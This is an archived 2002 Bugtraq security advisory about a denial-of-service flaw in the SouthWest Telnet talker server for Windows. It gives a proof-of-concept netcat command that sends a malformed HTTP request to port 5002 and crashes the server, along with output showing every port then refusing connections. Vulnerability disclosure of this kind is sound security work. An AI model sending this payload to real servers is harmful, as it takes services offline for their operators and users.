|
|
|
|
|
|
|
|
|
|
|
|
| home | help | back | first | fref | pref | prev | next | nref | lref | last | post |
Date: Mon, 25 Mar 2002 20:59:20 -0500 Message-Id: <200203260159.UAA10651@www20.ureach.com> To: bugtraq@securityfocus.com From: Alex Hernandez <alex_hernandez@ureach.com> Reply-To: <alex_hernandez@ureach.com> Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit ------oOo------ SouthWest free Telnet talker server. DoS (Denial of Service Attack). ------oOo------ Company Affected: Scott Lloyd Version: v1.0.0 Size: 2.74 MB OS Affected: : Windows ALL. Author: ** Alex Hernandez <alex_hernandez@ureach.com> ** Thanks all the people from Spain and Argentina. ** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti. ----=[Brief Description]=------------ SouthWest is a free Telnet talker server for Windows. It includes full ANSI color support, a help system, an intuitive interface, and speed optimizations. Free, full source code is available at the company's Web site. ----=[Summary]=---------------------- The server is very similar to the IRC, this server by default opens the following ports: *Main socket initialized and listen on port 5000. *Netlink socket initialized and listen on port 5001. *HTTP server initialized and listen port 5002. The bug is on port 5002, when requesting answer on remote user via HTTP for any user connected and crash the system. ------oOo------ Proof of concept Example: DoS $ printf "GET /&Alex" |nc -vvn 127.0.0.1 5002 (UNKNOWN) [127.0.0.1] 5002 (?) open sent 10, rcvd 0: NOTSOCK $ nc -vvn 127.0.0.1 5002 (UNKNOWN) [127.0.0.1] 5002 (?): connection refused sent 0, rcvd 0: NOTSOCK $ nc -vvn 127.0.0.1 5000 (UNKNOWN) [127.0.0.1] 5000 (?): connection refused sent 0, rcvd 0: NOTSOCK $ nc -vvn 127.0.0.1 5001 (UNKNOWN) [127.0.0.1] 5000 (?): connection refused sent 0, rcvd 0: NOTSOCK Crash system and the admin need restart the service!. U can see this on Screen [...] Room: Hallway You are in the hallway. The large front door leads out to the drive whilst another smaller door leads into the wizards room. A corridor leads deeper into the mansion. Exits are: Drive Wizroom Corridor Netlinks are: Cyber City You are all alone here Access is fixed to PUBLIC and there are 0 messages on the board. Current topic: Topic has not been set You say: Hello! You say: Friends You say: crash the system ..... Connection to host lost. [...] C:\> ------oOo------------------------------------ Vendor Response: The vendor was notified southwest@talker.com http://someplaceelse.dynip.com/southwest/ Patch Temporary: No data of vendor. Alex Hernandez <alex_hernandez@ureach.com> (c) 2002. ------oOo------------------------------------ ________________________________________________ Get your own "800" number Voicemail, fax, email, and a lot more http://www.ureach.com/reg/tag
|
|
|
|
|
|
|
|
|
|
|
|
| home | help | back | first | fref | pref | prev | next | nref | lref | last | post |